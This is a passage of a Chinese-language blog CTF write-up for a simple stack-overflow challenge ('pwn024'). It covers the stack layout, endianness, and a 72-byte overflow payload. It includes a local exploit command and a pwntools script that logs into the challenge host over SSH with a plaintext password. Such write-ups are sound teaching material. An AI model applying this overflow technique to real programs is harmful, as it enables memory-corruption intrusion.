<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs plain">Higher Memory Addresses<br>        +------------------+<br>        |      ...         |<br>        +------------------+<br>        |      n           | &lt;-- ebp - 0x18 (n占据8字节)<br>        +------------------+<br>        |     padding      | &lt;-- 从ebp-0x18到ebp-0x60之间的距离为0x48 (72字节)<br>        +------------------+<br>        |                  |<br>        |      buf         | &lt;-- ebp - 0x60 (buf数组占据64字节)<br>        |                  |<br>        +------------------+<br>        |      ...         |<br>Lower Memory Addresses<br></code></pre></td></tr></table></figure>

<p>从图中可以看到，buf 距离 n 变量的空间之间存在一个 72 字节的空档，因此我们需要填充 72 个字符，然后再把我们需要覆盖的字符输入，payload 如下，注意，因为数据存储使用的是小端序，因此最后的覆盖的字符串要反过来写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">b&quot;A&quot;*72 + b&quot;\xef\xbe\xad\xde\xef\xbe\xad\xde&quot;<br></code></pre></td></tr></table></figure>

<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">补充一下大端序和小端序：<br>端序（Endianness） 指的是多字节数据（如 <span class="hljs-keyword">int</span>, <span class="hljs-meta">float</span>, double）在 内存中 的存储顺序。<br>● 大端序（Big Endian）：高字节存在低地址，低字节存在高地址<br>● 小端序（Little Endian）：低字节存在低地址，高字节存在高地址<br>记忆方法可以当作填空题：___存在低地址，___存在高地址，大端序就是高字节在前，小端序就是低字节在前<br>同 <span class="hljs-meta">CPU</span> 体系结构选择不同的端序：<br>大端序（Big Endian）<br>● PowerPC, SPARC, IBM Mainframe, 网络协议（TCP/<span class="hljs-built_in">IP</span>）<br>● 适合人类阅读习惯，高字节在前<br>小端序（Little Endian）<br>● x86（Intel, AMD）, ARM（默认小端）<br>● 适合 <span class="hljs-meta">CPU</span> 计算，高字节的高位运算更高效<br></code></pre></td></tr></table></figure>



<p>我们输入这个paylaod 有两种方式，一种是直接 ssh 到目标主机，另一种是远程</p>
<h2 id="jMZMn">payload</h2>
<h3 id="WMlsf">本地执行</h3>

<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs moonscript">pwn024@i<span class="hljs-number">-0e928</span><span class="hljs-name">e6d1e91ce83d</span>:~$ ./runme <span class="hljs-string">&quot;$(python3 -c &#x27;import sys; sys.stdout.buffer.write(b&quot;</span>A<span class="hljs-string">&quot;*72 + b&quot;</span>\xef\xbe\xad\xde\xef\xbe\xad\xde<span class="hljs-string">&quot;)&#x27;)&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="Rbmrm">远程执行</h3>

<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><br><span class="hljs-comment"># 设置连接信息</span><br>target_ip = <span class="hljs-string">&#x27;pwn.baectf.com&#x27;</span>  # 远程主机的<span class="hljs-built_in"> IP </span>地址<br>target_port = 22  # 默认的 SSH 端口<br>username = <span class="hljs-string">&#x27;pwn024&#x27;</span>  # SSH 用户名<br>password = <span class="hljs-string">&#x27;gocartmozart&#x27;</span>  # SSH 密码<br>executable_path = <span class="hljs-string">&#x27;./runme&#x27;</span>  # 可执行文件的路径<br><span class="hljs-comment">#payload = b&#x27;A&#x27; * 72 + p64(0xdeadbeefdeadbeef)  # 假设这是你的 payload</span><br>payload  = b<span class="hljs-string">&#x27;A&#x27;</span><span class="hljs-number">*72</span> + p64(0xdeadbeefdeadbeef)<br><span class="hljs-comment"># 通过 SSH 连接到远程主机</span><br>p = ssh(<span class="hljs-attribute">host</span>=target_ip, <span class="hljs-attribute">user</span>=username, <span class="hljs-attribute">password</span>=password, <span class="hljs-attribute">port</span>=target_port)<br><br><span class="hljs-comment"># 在远程主机上执行可执行文件，并传递 payload 作为命令行参数</span><br>target_program = p.process([executable_path, payload])<br><br><span class="hljs-comment"># 获取程序的输出并打印</span><br>try:<br>    # 设置超时时间为 5 秒<br>    output = target_program.recv(<span class="hljs-attribute">timeout</span>=5)  # 接收最多 5 秒的输出<br>    <span class="hljs-built_in">print</span>(output.decode())  # 输出接收到的内容<br>except Exception as e:<br>    <span class="hljs-built_in">print</span>(f<span class="hljs-string">&quot;Error: &#123;e&#125;&quot;</span>)<br><br><span class="hljs-comment"># 如果需要进一步交互，可以使用 interactive() 函数进入交互模式</span><br>target_program.interactive()<br></code></pre></td></tr></table></figure>

<p><img src="/./result.png" srcset="/img/loading.gif" lazyload></p>
<p>这个题目使用IDA分析也是可以的</p>
<p><img src="/./static-analysis.png" srcset="/img/loading.gif" lazyload></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/" class="print-no-link">#pwn</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Simple Sstackoverflow</div>
      <div>http://k0rz3n.com/2025/08/20/simple-stackoverflow/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>K0rz3n</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>August 20, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - Non-commercial">
                    <i class="iconfont icon-cc-nc"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - Share-alike">
                    <i class="iconfont icon-cc-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/20/%E5%85%B3%E4%BA%8E%20IP%20%E5%8F%8D%E6%9F%A5%E5%92%8C%20CDN%20%E7%9A%84%E4%B8%80%E4%BA%9B%E9%97%AE%E9%A2%98/" title="关于 IP 反查和 CDN 的一些问题">
                        <span class="hidden-mobile">关于 IP 反查和 CDN 的一些问题</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
